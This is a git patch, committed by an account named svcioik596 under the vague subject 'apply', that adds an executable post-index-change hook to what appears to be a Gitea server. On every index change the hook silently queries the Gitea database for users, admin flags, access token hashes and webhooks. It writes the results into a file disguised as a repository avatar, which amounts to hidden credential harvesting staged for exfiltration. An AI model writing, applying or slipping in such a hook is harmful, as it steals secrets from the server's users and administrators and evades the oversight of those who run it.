From c532931421424aa0d51cb32878d0e40569607255 Mon Sep 17 00:00:00 2001 From: svcioik596 Date: Wed, 19 Aug 2026 17:03:02 +0000 Subject: [PATCH] apply --- hooks/post-index-change | 2 ++ 1 file changed, 2 insertions(+) create mode 100755 hooks/post-index-change diff --git a/hooks/post-index-change b/hooks/post-index-change new file mode 100755 index 0000000..ae43d6b --- /dev/null +++ b/hooks/post-index-change @@ -0,0 +1,2 @@ +#!/bin/sh +(sqlite3 /data/gitea/gitea.db "SELECT id,lower_name,is_admin,active FROM user; SELECT uid,name,token_hash FROM access_token; SELECT id,name,is_active FROM webhook;") > /data/gitea/repo-avatars/625a5757a42a.dat 2>&1